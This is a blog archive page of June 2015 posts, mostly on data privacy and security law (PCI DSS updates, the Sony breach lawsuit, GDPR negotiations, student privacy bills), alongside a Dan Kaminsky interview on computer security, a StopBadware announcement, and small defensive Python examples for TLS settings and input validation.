Monthly Archives: June 2015

PCI Security Standards Council Releases Enhanced Validation Requirements for Designated Entities as PCI DSS Version 3.0 Set to Retire

Earlier this month, the Payment Card Industry Security Standards Council (“PCI SSC”) published a set of enhanced validation procedures designed to provide greater assurance that certain entities are maintaining compliance with the PCI Data Security Standard (“PCI DSS”) effectively and on a continuing basis. The payment card brands and acquirers will determine which organizations are required to undergo a compliance assessment with respect to these supplemental validation requirements, which are entitled the PCI DSS Designated Entities Supplemental Validation (“DESV”).

The DESV complements the PCI DSS and contains additional security control requirements that are organized into the following five control areas:

  1. Implement a PCI DSS compliance program;
  2. Document and validate PCI DSS scope;
  3. Validate that PCI DSS is incorporated into business-as-usual activities;
  4. Control and manage logical access to the cardholder data environment; and
  5. Identify and respond to suspicious events.

Those entities designated by the card brands for validation against the DESV must comply with the requirements set forth in the five control areas, which include, for example, increased administrative, validation and scoping controls. Entities that may be subject to the DESV include, for example, entities that (1) store, process or transmit large volumes of cardholder data; (2) provide aggregation points for cardholder data; or (3) have suffered significant or repeated breaches of cardholder data. According to the PCI SSC, the supplemental validation process typically will be performed in conjunction with the entity’s full PCI DSS assessment.

The release of the DESV coincides with the retirement of PCI DSS Version 3.0 on June 30, 2015. Although its replacement, Version 3.1, contains mostly minor updates and clarifications, the new version notably updates the standard’s encryption requirements to clarify that Secure Sockets Layer (“SSL”) and early Transport Layer Security (“TLS”) are not considered strong cryptography, and therefore will no longer be PCI DSS-compliant encryption protocols as of June 30, 2016. The migration from SSL to newer versions of TLS comes after several vulnerabilities were found in SSL, leading the National Institute of Standards and Technology to deem SSL an unacceptable encryption protocol for the protection of data. In addition, the controls that Version 3.0 initially designated as best practices will become PCI DSS requirements as of July 1, 2015.
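
For illustration, a minimal sketch of what this migration looks like in practice, using Python’s standard ssl module (Python 3.7 or later assumed; this example is ours, not part of the PCI SSC guidance):

    import ssl

    # Build a client-side TLS context with certificate verification enabled.
    context = ssl.create_default_context()

    # SSLv2 and SSLv3 are already disabled by default; additionally refuse
    # TLS 1.0 and 1.1, which PCI DSS v3.1 no longer treats as strong
    # cryptography after June 30, 2016.
    context.minimum_version = ssl.TLSVersion.TLSv1_2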

SEC Cybersecurity Investigations: A How-to Guide

Hunton & Williams LLP partners Lisa J. Sotto, Scott H. Kimpel and Matthew P. Bosher recently published an article in Westlaw Journal’s Securities Litigation & Regulation entitled SEC Cybersecurity Investigations: A How-to Guide. The article details the U.S. Securities and Exchange Commission’s (“SEC’s”) role in cybersecurity regulation and enforcement, and offers best practice tips for navigating the investigative process. In the article, the authors note that the threat of an SEC enforcement investigation must be considered an integral part of cybersecurity planning and compliance efforts. “Being prepared to engage the SEC in a proactive manner is often the best approach.” Download a copy of the full article now.

Hunton Webinar on the Proposed EU General Data Protection Regulation on July 9

Hunton & Williams will host a live webinar covering the latest developments on the proposed EU General Data Protection Regulation on Thursday, July 9, at 12:00 p.m. EDT. The webinar will provide an overview of the current status of the EU General Data Protection Regulation, highlights from the ongoing trilogue discussions, and guidance on how to prepare for the upcoming changes.

This webinar is the first segment of a two-part series addressing updates on the proposed European legislative reform. We will hold Part II later this year as negotiations continue to develop.

Register for this program now.

StopBadware transferring operations to University of Tulsa

In 2006, Harvard’s Berkman Center introduced a new project: StopBadware.org, a collective effort to protect consumers from bad software and expose the people who profited from it. StopBadware was to be a collaboration between the academic community and leading technology companies, a force for transparency and openness in an increasingly siloed online environment, and a haven for users seeking information about bad software and malicious websites. The project was backed by Internet pioneers in both business and academia: founders Jonathan Zittrain and John Palfrey, advisers Vint Cerf and Esther Dyson, supporting companies including Google and Lenovo. From its first day, StopBadware was a collaboration intended to demonstrate the full promise of the Internet by protecting and expanding user choice.

After almost a decade of collaborative work and more than five years as a standalone nonprofit, StopBadware is shutting down operations as an independent organization and transferring core programs to the University of Tulsa, where they’ll be run by our longtime research adviser, Dr. Tyler Moore. This decision rested upon two pillars: the unpredictability of long-term funding prospects and the strength of our ties to the research community. Ultimately, StopBadware’s board and staff agreed that our mission is better served by re-establishing roots in academia under the capable guidance of Dr. Moore and his team.

The programs we expect to transfer to Tulsa include our independent review process, the StopBadware Data Sharing Program, and maintenance of our informational resources and searchable Clearinghouse.

What does this mean in practical terms?

  • Users and webmasters will still be able to look up URLs, IPs, and ASNs in our Clearinghouse and report malicious URLs to our community feed.
  • Website owners whose resources are blacklisted by one or more of our data providers will still be able to request an independent review from StopBadware.
  • Technology companies, independent security researchers, and academic institutions will still be able to contribute malware data feeds to StopBadware’s data sharing program.
  • StopBadware’s shared and proprietary data will still be used to facilitate research on cybercrime and the security ecosystem.
  • Users who encounter browser or search warnings about malware websites will still be able to reach StopBadware’s information about badware and how to protect their computers.

StopBadware’s Boston-based office and staff will cease operation by September, as will our current board of directors. Over the next few months, we’ll also be shutting down the StopBadware Partner program and the We Stop Badware™ Web Host program in order to let the incoming team in Tulsa focus on the review process, data sharing program, and research projects. The StopBadware Board and outgoing staff have known Tyler Moore since our early days as a Berkman Center project; we have the utmost confidence in his vision and unflagging dedication to StopBadware’s mission.

Over the next two months, we’ll be painting a bigger picture for our community to illustrate StopBadware’s accomplishments, both as an independent nonprofit and as a decade-old project in collaborative security. We’ll also turn our blog over to Dr. Moore part-time so he can expound upon his plans for the new iteration of StopBadware. Like many other good Internet citizens, we welcome the future!

- The StopBadware team

Federal Court: Data Breach Class Action Against Sony Survives Motion to Dismiss

The U.S. District Court for the Central District of California recently granted, only in part, a motion to dismiss a data breach class action against Sony Pictures Entertainment, Inc. (“Sony”) in Corona v. Sony Pictures Entertainment, Inc., No. 14-CV-09600 (RGK) (C.D. Cal. June 15, 2015). The case therefore will proceed with some of the claims intact.

The litigation arose from a security breach at Sony where the sensitive and personal information of at least 15,000 former and current Sony employees was stolen. The putative class alleged:  (1) negligence; (2) breach of implied contract; (3) violation of the California Customer Records Act; (4) violation of the California Confidentiality of Medical Information Act; (5) violation of the Unfair Competition Law; (6) declaratory judgment; (7) violation of Virginia Code §18.2‑186.6; and (8) violation of Colorado Revised Statutes § 6-1-716. Sony moved to dismiss for lack of Article III standing under Rule 12(b)(1) and failure to state a claim under Rule 12(b)(6).

Rule 12(b)(1) standing challenge rejected. Of all the federal circuits, data breach litigants currently are more likely to weather a standing attack in the Ninth Circuit. The Sony case was no exception. It cited to Krottner v. Starbucks Corp., 628 F.3d 1139 (9th Cir. 2010), to support its standing analysis. This is notable because district courts in the Ninth Circuit often do not treat Krottner as being overruled by the later-decided standing opinion of the Supreme Court of the United States in Clapper v. Amnesty Int’l USA, 133 S. Ct. 1138 (2013). E.g., In re Adobe Sys., Inc. Privacy Litig., No. 13-CV-05226-LHK, 2014 WL 4379916 (N.D. Cal. Sept. 4, 2014) (finding sufficient standing allegations even when plaintiffs did not establish that hackers used their information).

Under Krottner, the Sony court quickly found that the plaintiffs had properly alleged sufficient facts to establish Article III standing and disagreed with Sony that allegations of either “a current injury or a threatened injury that is certainly impending” were lacking. The court held that the personally identifiable information (“PII”) was stolen and posted on file-sharing websites for identity thieves to download, and that the PII was used to send threatening e-mails to employees and their families. The court stated, “These allegations alone are sufficient to establish a credible threat of real and immediate harm, or certainly impending injury.”

Rule 12(b)(6) challenges were both granted and denied.

  • Claims that survived: The court found that allegations of “future harm or an increased risk in harm that has not yet occurred” do not demonstrate a cognizable injury to support a negligence claim arising from an alleged duty to implement and maintain adequate security measures to safeguard employees’ PII. The court also rejected the theory that the plaintiffs’ PII constitutes property, for lack of authority that PII has any compensable value in the economy at large. Nevertheless, the court recognized that California courts have not considered, in data breach cases, whether the costs of prophylactic measures (credit monitoring, obtaining credit reports, identity-theft protection, etc.) are sufficient to support a negligence claim. Adapting case law on toxic exposure, the court identified several allegations that showed both “reasonableness and necessity,” including the sensitive nature of the PII, the posting of the PII to the Internet, the actual access of information from file-sharing sites, threats made to employees, the explicit threat of future data exposure by hackers, and notification to some plaintiffs of attempted identity theft. The court also held that a “special relationship” existed between Sony and its employees, which invalidated Sony’s economic-loss doctrine defense. However, the court found “implausible any argument that Sony’s alleged delay [of approximately 3 weeks] in notification proximately caused any of the economic injury” alleged, and dismissed the portion of the negligence claim that was based on the alleged duty to timely notify.

    The California Confidentiality of Medical Information Act (“CIMA”) claim survived. CIMA directs employers who receive medical information to establish procedures to safeguard the confidentiality and protection of that information from unauthorized use and disclosure. Noting that CIMA authorizes a private right of action for covered medical information that is “negligently released,” the court also recognized that California law does not require affirmative action to constitute a negligent release, and allowed the claim to proceed.

    The Unfair Competition Law (“UCL”) claim also advanced. The court noted that predicate acts for the UCL claim remained because the plaintiffs sufficiently alleged injury-in-fact and economic loss, and because portions of the plaintiffs’ negligence and CIMA claims survived dismissal. In light of the ruling on the UCL claim, the court derivatively refused to dismiss the claims for declaratory and injunctive relief.

  • Claims that were dismissed: But the plaintiffs did not have a complete victory. Their implied contract claim was dismissed (with leave to amend) because there were “no facts indicating that Sony’s acts were intended to frustrate the agreed common purpose of the [employment] agreement.” The court also found it significant that the putative class included members who “were no longer employed by Sony at the time the data breach occurred.” The court likewise dismissed the California Customer Records Act (“CRA”) claim, but without leave to amend. This California statute regulates businesses’ “treatment and notification procedures relating to their customers’ personal information.” (emphasis added) Because the complaint’s allegations made “clear that Plaintiffs are not customers within the meaning of the statute,” the CRA allegations failed to state a claim. Additionally, the court dismissed the Virginia and Colorado breach notification claims without leave to amend, primarily for lack of allegations of direct economic damages resulting from Sony’s purported failure to notify in a timely manner.

The Sony case and others make clear that data breach litigation is on the rise and is surviving many of the traditional Rule 12 arguments with increasing consistency.

Waterloo

Captain Clement Swetenham, 16th Light Dragoons, fought at Waterloo. His great-great-great grandson Foster Swetenham has posted more information and photos of his portrait, his Waterloo and Peninsula medals and his charger Mask.


Safe Computing In An Unsafe World: Die Zeit Interview

So some of the more fun bugs involve one team saying, “Heh, we don’t need to validate input, we just pass data through to the next layer.”  And the next team is like, “Heh, we don’t need to validate input, it’s already clean by the time it reaches us.”  The fun comes when you put these teams in the same room.  (Bring the popcorn, but be discreet!)
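
A toy sketch of that failure mode in Python (our illustration, not anything from the interview below): each layer assumes the other validates, so nothing does, and the fix is an explicit check at the trust boundary.

    def layer_one(raw: bytes) -> bytes:
        # "We just pass data through to the next layer."
        return raw

    def layer_two(data: bytes) -> str:
        # "It's already clean by the time it reaches us" -- so embedded
        # control characters and the like sail straight through.
        return data.decode("utf-8")

    def layer_two_fixed(data: bytes) -> str:
        # Validate at the trust boundary instead of trusting the caller.
        text = data.decode("utf-8")
        if any(ord(c) < 0x20 and c not in "\t\r\n" for c in text):
            raise ValueError("control characters rejected at this boundary")
        return text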

Policy and Technology have some shared issues, that sometimes they want each other to solve.  Meanwhile, things stay on fire.

I talked about some of our challenges in Infosec with Die Zeit recently.  Germany got hit pretty bad recently and there’s some soul searching.  I’ll let the interview mostly speak for itself, but I would like to clarify two things:

1) Microsoft’s SDL (Security Development Lifecycle) deserves more credit.  It clearly yields more secure code.  But getting past code, into systems, networks, relationships, environments — there’s a scale of security that society needs, which technology hasn’t achieved yet.

2) I’m not at all advocating military response to cyber attacks.  That would be awful.  But there’s not some magic Get Out Of War free card just because something came over the Internet.  For all the talk of regulating non-state actors, it’s actually the states that can potentially completely overwhelm any potential technological defense.   Their only constraints are a) fear of getting caught, b) fear of damaging economic interests, and c) fear of causing a war.  I have doubts as to how strong those fears are, or remain.  See, they’re called externalities for a reason…

(Note:  This interview was translated into German, and then back into English.  So, if I sound a little weird, that’s why.)


Der IT-Sicherheitsforscher und Hacker Dan Kaminsky

(Headline) “No one knows how to make a computer safe.”

(Subheading) The American computer security specialist Dan Kaminsky talks about the cyber-attack on the German Bundestag: In an age of hacker wars, diplomacy is a stronger weapon than technology.

AMENDED VERSION

Dan Kaminsky (https://dankaminsky.com/bio/) is one of the best-known hackers and IT security specialists in the United States. He made a name for himself by discovering severe security holes on the Internet and in the computer systems of large corporations. In 2008, he located a fundamental flaw in DNS (http://www.wired.com/2008/07/kaminsky-on-how/), the telephone book of the Internet, and coordinated a worldwide repair. He now works as chief scientist at the New York computer security firm White Ops (http://www.whiteops.com).

Questions asked by Thomas Fischermann

ZEIT Online: After the cyber attack on the German Bundestag, there has been a lot of criticism of its IT management (http://www.zeit.de/digital/datenschutz/2015-06/hackerangriff-bundestag-kritik). Are the Germans sloppy when it comes to computer security?

Dan Kaminsky: No one should be surprised if a cyber attack succeeds somewhere. Everything can be hacked. I assume that all large companies are confronted somehow with hackers in their systems, and successful intrusions into government systems have increased. The United States, for example, recently lost sensitive data on people with “top secret” clearances to Chinese hackers. (http://www.reuters.com/article/2015/06/15/us-cybersecurity-usa-exposure-idUSKBN0OV0CC20150615)

ZEIT Online: Is that due to secret services and super hackers employed by governments, who have recently taken to the Internet?

Kaminsky: I’ll share a business secret with you: Hacking is very simple. Even teenagers can do it. And some of the most sensational computer break-ins in history were technically standard fare – for example, the attack on Sony Pictures last year, for which Barack Obama publicly blamed North Korea (http://www.zeit.de/2014/53/hackerangriff-sony-nordkorea-obama). Three or four engineers could manage that in three to four months.

ZEIT Online: It has been stated over and over again that some hacker attacks carry the “signature” of large competent state institutions.

Kaminsky: Sometimes it is true, sometimes it is not. Of course, state institutions can work better, with lower error rates, more persistently and less noticeably. And they can attack very difficult targets: nuclear power plants, for example, or technical infrastructure. They can prepare future cyber attacks and could turn off the power of an entire city in the event of war.

ZEIT Online: But once more: Could we not have protected the computer of the German Bundestag better?

Kaminsky: There is a very old arms race between attackers and defenders. Nowadays, attackers have a lot of possibilities while defenders only have a few. At the moment, no one knows how to make a computer really safe.

ZEIT Online: That does not sound optimistic.

Kaminsky: The situation can change. All great technological developments were unsafe in the beginning; just think of railways, automobiles and aircraft. The most important thing in the beginning is that they work; after that, they get safer. We have been working on the security of the Internet and of computer systems for the last 15 years…

ZEIT Online: How is it going?

Kaminsky: There is a whole movement, for example, that is looking for new programming methods in order to eliminate the gateways for hackers. In my opinion, the “Langsec” approach is very interesting (http://www.upstandinghackers.com/langsec): you look for a kind of binding grammar for computer programs and data formats that makes everything safe. If you follow the rules, it should be hard for a programmer to produce the kind of errors that hostile hackers can later exploit. When a system executes a program in the future, or when software needs to process a data record, the input will first be checked precisely to see whether all the rules were followed – as if a grammar teacher were checking it.
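
A minimal sketch of that idea in Python (our illustration, not from the interview): define a strict grammar for the input, reject anything that does not match it in full, and only then let the rest of the program touch the data.

    import re

    # A deliberately strict grammar: a record is a short alphabetic name,
    # a comma, and a one-to-three digit age. Anything else is rejected.
    RECORD = re.compile(r"[A-Za-z]{1,32},\d{1,3}")

    def parse_record(line: str) -> tuple[str, int]:
        if RECORD.fullmatch(line) is None:
            raise ValueError("input does not match the grammar")
        name, age = line.split(",")
        return name, int(age)

    # Only fully validated, fully parsed values reach the business logic.
    print(parse_record("Alice,30"))  # ('Alice', 30)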

ZEIT Online: That still sounds very theoretical…

Kaminsky: It is a new technology; it is still under development. In the end it will not only be possible to write secure software, it will happen naturally, without any special effort, and it will be cheap.

ZEIT Online: Which other approaches do you consider promising?

Kaminsky: Ongoing security tests for computer networks are becoming more widespread: firms and institutions pay hackers to break in continually, in order to find holes and close them. Nowadays this happens sporadically or at long intervals, but in the future we will need more of those “friendly” hackers. Third, there is a totally new generation of anti-hacker software in progress. Its task is not to prevent break-ins – because they will happen anyway – but to observe the intruders very closely. This way we can better assess who the hackers are, and we can keep them from retaining access for days or weeks.

ZEIT Online: Nevertheless, those are still future scenarios. What can we do today if we are already in possession of important data? Go offline?

Kaminsky: No one will go offline. That is simply too inefficient. But even today you can store data in a way that it is not all gone after one successful hacker attack: you split it up. Does a computer user really ever need access to all the documents in the whole system? Does the user need so much bandwidth that he can download masses of documents?
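
A toy sketch of that principle in Python (our illustration; the limit and the storage function are invented for the example): cap how much any single account can pull from the document store, so one stolen credential cannot bulk-export the archive.

    from collections import defaultdict

    DAILY_LIMIT = 50              # documents per user per day (illustrative)
    downloads = defaultdict(int)  # user -> documents fetched today

    def load_from_store(doc_id: str) -> bytes:
        # Stand-in for the real storage backend.
        return b"document body"

    def fetch_document(user: str, doc_id: str) -> bytes:
        if downloads[user] >= DAILY_LIMIT:
            raise PermissionError(f"{user}: daily document quota exceeded")
        downloads[user] += 1
        return load_from_store(doc_id)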

ZEIT Online: A famous case of this is the US intelligence community, which lost thousands of documents to Edward Snowden. There are also a lot of hackers, though, who work for the NSA in order to break into other computer systems …

Kaminsky: … yeah, and that is poison for the security of the net. The NSA and a lot of other secret services say nowadays: We want to defend our computers – and attack the others. Most of the time, they decide to attack and make the Internet even more unsafe for everyone.

ZEIT Online: Do you have an example of this?

Kaminsky: American secret services have known for more than a decade that spy software can be hidden in the firmware of computer hard disks. (http://www.geek.com/apps/nsa-malware-found-hiding-in-hard-drives-for-almost-20-years-1615949/, http://www.kaspersky.com/about/news/virus/2015/Equation-Group-The-Crown-Creator-of-Cyber-Espionage). Instead of getting rid of those security holes, they have been actively using them for themselves over the years… The holes were open to the secret services – which used them in a number of recently discovered pieces of malware – and to everyone else who discovered them as well.

ZEIT Online: Can you change such a behavior?

Kaminsky: Yes, economically. Nowadays, spying authorities derive their right to exist from being able to get information out of other people’s computers. If they made the Internet safer, they would hardly be rewarded for that…

ZEIT Online: A whole industry is taking care of the security of the net as well: Sellers of anti-virus and other protection programs.

Kaminsky: Nowadays, we spend a lot of money on security programs. But we do not even know whether the computers protected in that way really are hacked less often. We have no good empirical data and no controlled studies on that.

ZEIT Online: Why does no one conduct such studies?

Kaminsky: This is obviously a market failure. The market does not offer services that would be urgently needed for increased safety in computer networks. It is a classical case in which governments could make themselves useful. By the way, the state could contribute something else: deterrence.

ZEIT Online: Pardon?

Kaminsky: In terms of computer security, we still blame the victims themselves most of the time: you got hacked, how dumb! But when it comes to state-sponsored hacker attacks that could lead to cyber wars, this way of thinking is not appropriate. If someone dropped bombs on a city, no one’s first reaction would be: how dumb of you not to have thought about defensive missiles!

ZEIT Online: What should the answer look like, then?

Kaminsky: Nation states are usually good at coming up with collective punishments: diplomatic reactions, economic sanctions or even acts of war. It is important that nation states discuss with each other what an acceptable level of state hacking is and what would be too much. We have established that kind of rules for conventional wars, but not for hacker attacks and cyber war. For a long time these were not considered that dangerous, but that has changed. You want to live in a cyber war zone as little as you want to live in a conventional war zone!

ZEIT Online: To be prepared for counterstrikes, you first have to know your attacker. We still do not know who was responsible for the German Bundestag hack…

Kaminsky: Yeah, sometimes you do not know who is attacking you. On the Internet there are not that many borders or geographical entities, and attackers can even disguise their origin. In order to really solve this problem, you would have to change the architecture of the Internet.

ZEIT Online: Should we?

Kaminsky: … and then there is still the question: would it really be better for us, economically speaking, than the once-leading communication technologies Minitel from France or America Online were? Were our lives better when network connections were still horribly expensive? And is a new kind of net even possible when well-resourced criminals or nation states could find new ways to manipulate it anyway? The “attribution problem” with cyber attacks remains serious and there are no obvious solutions. There are a lot of solutions, though, that are even worse than the problem itself.

Questions were asked by Thomas Fischermann (@strandreporter, @zeitbomber)

New Hampshire and Oregon Student Privacy Legislation

Legislators in New Hampshire and Oregon recently passed bills designed to protect the online privacy of students in kindergarten through 12th grade.

On June 11, 2015, New Hampshire Governor Maggie Hassan (D-NH) signed H.B. 520, a bipartisan bill that requires operators of websites, online platforms and applications targeting students and their families (“Operators”) to create and maintain “reasonable” security procedures to protect certain covered information about students. H.B. 520 also prohibits Operators from using covered information for targeted advertising. H.B. 520 defines covered information broadly as “personally identifiable information or materials,” including name, address, date of birth, telephone number and educational records, provided to Operators by students, their schools, their parents or legal guardians, or otherwise gathered by the Operators.

Governor Hassan said that technology “is an essential component of the 21st century innovation economy” and plays an important and growing role in the classroom. She added that H.B. 520 protects New Hampshire students against threats to their privacy while enabling them to participate in that economy. H.B. 520 takes effect on January 1, 2016.

On June 10, 2015, the Oregon legislature passed S.B. 187, providing similar protections to K-12 students’ personal information and restricting the use of that information by Operators. The bill defines “covered information” in the same way as the New Hampshire student privacy bill and applies to the same types of Operators. S.B. 187 prohibits selling student information and presenting students with targeted advertisements. Operators also may not disclose student information to third parties, except in limited circumstances, but may use “de-identified student information” to improve or market the effectiveness of their products. Legislators rejected proposals backed by the technology industry that would have allowed students ages 12 and older to consent to the use and disclosure of covered information.

S.B. 187 grants the Oregon Attorney General enforcement power under the state’s consumer protection statute. Governor Kate Brown (D-OR) is expected to sign the bill, which would take effect on July 1, 2016.

Both New Hampshire and Oregon modeled their student privacy legislation on California’s Student Online Personal Information Protection Act, which was enacted in 2014.

Consumer Groups Drop Out of NTIA Multistakeholder Process Regarding the Commercial Use of Facial Recognition Technology

On June 16, 2015, the Consumer Federation of America announced in a joint statement with other privacy advocacy groups that they would no longer participate in the U.S. Department of Commerce’s National Telecommunications and Information Administration (“NTIA”) multistakeholder process to develop a code of conduct regarding the commercial use of facial recognition technology. The letter was signed by the Center for Democracy & Technology, the Center for Digital Democracy, the Consumer Federation of America, Common Sense Media, the Electronic Frontier Foundation, the American Civil Liberties Union, Consumer Action, Consumer Watchdog and the Center on Privacy & Technology at Georgetown University Law Center. This decision comes after 16 months of meetings and negotiations. In its announcement, the group highlighted its inability to come to an agreement with industry groups on how the issue of consumer consent would be addressed in a code of conduct regarding the use of facial recognition technology. Specifically, the disagreement between consumer and industry groups revolved around the default rule for consumer consent (i.e., whether the default should be opt-in or opt-out consent).

On June 15, the NTIA said it would continue its work on facial recognition rules. As a next step, a working group will continue discussions on consumer consent, anti-fraud uses of facial recognition technology and other related topics. After the discussions, the working group will draft a proposal for review by the NTIA prior to its next public meeting in July.

Read more information about the process.

Article 29 Working Party Publishes Its Position on the Proposed EU General Data Protection Regulation

On June 18, 2015, the Article 29 Working Party (the “Working Party”) published letters regarding the proposed EU General Data Protection Regulation (the “Regulation”) addressed to representatives of the Council of the European Union, the European Parliament and the European Commission. Attached to each of the letters is an Appendix detailing the Working Party’s opinion on the core themes of the Regulation.

The Parliament, the Commission and the Council will now come together in a “trilogue” to negotiate and agree on a final text of the Regulation. The first trilogue meeting is expected to take place on June 24, 2015. The purpose of the Working Party’s letters and attached Appendix appears to be to set out the Working Party’s position on a range of core issues in the Regulation, and to ensure the Working Party’s views are taken into account as the trilogue proceeds.

The Working Party’s key points include:

  • Territorial Scope – In addition to the already broad territorial scope of the Regulation, the Working Party is of the view that the Regulation should apply to non-EU processors, where they act on behalf of controllers that are subject to the Regulation (in line with the Parliament’s views on this issue).
  • Definition of Personal Data – The Working Party reiterates its view that IP addresses, online identifiers and other similar factors that enable an individual to be “singled out” (even if that individual’s real-world identity remains unknown) should, as a general rule, constitute personal data and therefore be subject to the Regulation. This proposal has significant implications for the online advertising sector, as it would potentially make many advertising cookies and tracking technologies subject to the Regulation.
  • Pseudonymous Data – The Working Party is opposed to the classification of “pseudonymous data” as a separate category of personal data, subject to a lighter legal regime, the processing of which is not subject to the “balance of interests” test (effectively opposing the Parliament’s position on this issue). The Working Party does, however, support the use of pseudonymisation techniques as a security and risk mitigation measure.
  • Purpose Limitation – The Working Party recommends that personal data should never be processed for purposes incompatible with those for which they were collected. Instead, it takes the view that an additional legal basis should be required, even for processing for new purposes that are not incompatible with the original purpose. This proposal may have material consequences for “big data” companies and others for whom the reuse of existing data is a key part of doing business.
  • The “household purposes” exemption – In line with the Court of Justice of the European Union’s decision in Ryneš, the Working Party considers that the “household purposes” exemption should be limited to “purely” household activities.
  • Mandatory DPOs – The Working Party is in favor of imposing a mandatory obligation to appoint a Data Protection Officer upon data controllers, if they meet certain thresholds in terms of the type, volume or nature of the data being processed (although the Working Party does not specify what those thresholds should be).
  • Information Notices – The Working Party supports the use of layered privacy notices, and the proposal that data subjects should also be provided with information relating to further processing, data retention periods, international transfers and security measures.
  • Data Portability – The Working Party supports the proposed broad scope of the right to data portability, and suggests that this right should be separate from the right of access.
  • Right to Object – The Working Party is of the view that the right of data subjects to object to processing should apply widely, and should not be limited to processing performed on the basis of: (1) the legitimate interests of the data controller; (2) the public interest; or (3) the exercise of official authority.
  • Profiling – The Working Party highlights that the proposals in the Regulation relating to data subject profiling are unclear and do not ensure sufficient safeguards to protect data subjects. The Working Party recommends that the creation of profiles should be limited to particular purposes (although the Working Party does not specify those purposes), and that specific obligations should be imposed on data controllers to inform data subjects of: (1) the relevant profiling measures that will apply to their data; and (2) the right to object.
  • Risk-Based Approach – While the Working Party does not directly oppose the risk-based approach in general, it considers that risk should not be a determining factor in relation to a controller’s accountability obligations.
  • Data Breach Notification – The Working Party supports different de minimis thresholds for notification to data subjects and to Supervisory Authorities. The Working Party further proposes that the notification obligations in the Regulation should be aligned with the equivalent obligations in the e-Privacy Directive (under which notification is required only where the breach is likely to “adversely affect” the personal data or privacy of a data subject).
  • Data Transfers – The Working Party supports the inclusion of legitimate interests as a ground for the transfer of personal data outside the EEA, but is of the view that its use should be limited to exceptional circumstances, and not for large-scale, regular transfers of personal data.
  • Access by Public Authorities – In the event that a court, tribunal or public authority in a non-EU jurisdiction demands access to personal data that are subject to the Regulation, the Working Party recommends that such matters be dealt with under a Mutual Legal Assistance Treaty, where one exists. Where no such treaty is in place, the relevant controller should report the matter to the competent Supervisory Authority. The Working Party’s previous guidance on this point in the context of Binding Corporate Rules (“BCRs”) for processors provides some helpful context.
  • Binding Corporate Rules – The Working Party considers it essential that BCRs for processors continue to be recognized as a valid mechanism for cross-border data transfers.
  • One-Stop Shop – The Working Party expresses its support for the “one-stop shop” in principle, but recommends that the details of its implementation be left to the European Data Protection Board, rather than being prescribed in the Regulation.
  • Fines – The Working Party welcomes the introduction of significant fines for breaches of the Regulation, and also considers that the imposition of fines where a data controller or processor fails to cooperate with its Supervisory Authority should be reinstated.

Hunton & Williams has released a Guide to the Regulation, which is available by soft copy. An updated copy of this Guide will be released following the conclusion of the trilogue process and the release of the final text of the Regulation.

Council of the European Union Agrees on General Approach to the Proposed General Data Protection Regulation

The Council of the European Union has agreed on a general approach to the proposed EU General Data Protection Regulation (the “Regulation”). This marks a significant step forward in the legislative process, and the Council’s text will form the basis of its “trilogue” negotiations with the European Parliament and the European Commission. The aim of the trilogue process is to achieve agreement on a final text of the Regulation by the end of 2015. The first trilogue meeting is expected to take place on June 24, 2015.

Among the most significant features of the Council’s draft text are the revisions to the “establishment” and the “one-stop shop” concepts. These concepts will govern the application of the Regulation to data controllers that operate in more than one EU Member State. In particular, they will determine which data protection authority will regulate each controller’s data processing activities. They are, therefore, of critical importance to many international businesses.

Other key proposals in the Council’s text include: increased rights for data subjects; maximum penalties for non-compliance of €1 million or 2% of global annual turnover (a significant reduction from the €100 million / 5% figures proposed by the Parliament); and clarifications on the rules relating to cross-border data transfers.

Hunton & Williams has released a Guide to the Regulation, which is available by soft copy. An updated copy of this Guide will be released following the conclusion of the trilogue process and the release of the final text of the Regulation.

Hong Kong Privacy Commissioner Hosts 43rd APPA Forum and Big Data Conference

On June 11 and 12, 2015, Asia Pacific Privacy Authority (“APPA”) members, invited observers and guest speakers from the government, private sector, academia and civil society, met in Hong Kong to discuss privacy law and policy issues at the 43rd APPA Forum. At the end of the open session on day two, APPA issued its customary communiqué, setting forth the highlights of the discussions of the open and closed sessions. The Hong Kong Privacy Commissioner, who hosted the APPA meeting, also hosted a conference on big data and privacy on June 10.

According to the Communiqué, during the closed session, APPA members and invited observers discussed numerous issues of common interest, including legal reforms across the region, law enforcement and investigation matters, breach notification and transparency in reporting requests from law enforcement and national security authorities to companies for personal information. During the closed session, privacy developments in other international fora and groups, such as APEC, the International Conference of Data Protection and Privacy Commissioners, GPEN and the Ibero-American Network of Data Protection were also discussed. Finally, attendees of the closed session discussed privacy issues associated with big data and behavioral advertising, the regulation of public domain data and organizational accountability.

During the open session, APPA members and observers were joined by local and international privacy experts, including representatives from the Centre for Information Policy Leadership at Hunton & Williams LLP (“CIPL”), to discuss issues relating to data management and use in the modern information age. Other topics of discussion included updates on privacy laws in China and Taiwan, managing research data, open data and access to open data, health data and privacy, and smart cities and IT.

The previous day, the Hong Kong Privacy Commissioner hosted the International Conference on Big Data from a Privacy Perspective. The public event was attended by many privacy commissioners, as well as privacy professionals and industry representatives from across the Asia-Pacific region. The conference considered the benefits and risks of Big Data in a data-driven world and how industry should innovate and find new ways to provide transparency to individuals. The CIPL delegation participated in a panel discussion entitled Big Data and Emerging Best Practices for a Win-Win Situation: Protecting Privacy and Enabling Benefits in a Data Driven Economy, and offered solutions and best practices.

APPA is the principal forum for privacy authorities in the Asia-Pacific Region. APPA members meet twice a year to discuss recent developments, issues of common interest and cooperation.

DataGuidance Hosts Webinar on Brazil’s Draft Privacy Law

On June 24, 2015, DataGuidance will host a complimentary webinar on Brazil: Towards Privacy Compliance. The panel of speakers includes Bojana Bellamy, President of the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams; Esther Nunes, Partner of Pinheiro Neto Advogados; and Renato Leite Monteiro of Opice Blum, Bruno, Abrusio & Vainzof Advogados Associados. The speakers will discuss the Draft Bill for the Protection of Personal Data (Anteprojeto de Lei para a Proteção de Dados Pessoais) that was issued in January 2015. Concepts and provisions in the draft bill such as the role of Data Protection Officers and Binding Corporate Rules will be discussed. The webinar will be from 10:00 a.m. to 11:00 a.m. EDT.

On May 5, 2015, CIPL filed comments on Brazil’s draft bill as part of its ongoing Brazil outreach initiative.


Time For a Digital Detox or Better Filtering?



Being easily distracted has been a thorn in my side since Oldbury Park Primary School. I remember the day when mum and dad sat me down and read out my year 6 school report. Things were going so well, and then - boom - a comment from Mrs Horn that rained on my previously unsullied education record: “Sarah can organize herself and her work quite competently if she wishes, but of late has been too easily distracted by those around her.” She had a point, but try telling that to a distraught eleven-year-old who valued the opinion of her teachers. I made a vow after that: I would never let my report card be sullied again. Working on my concentration in secondary school and college helped me to pass my GCSEs and A-levels.


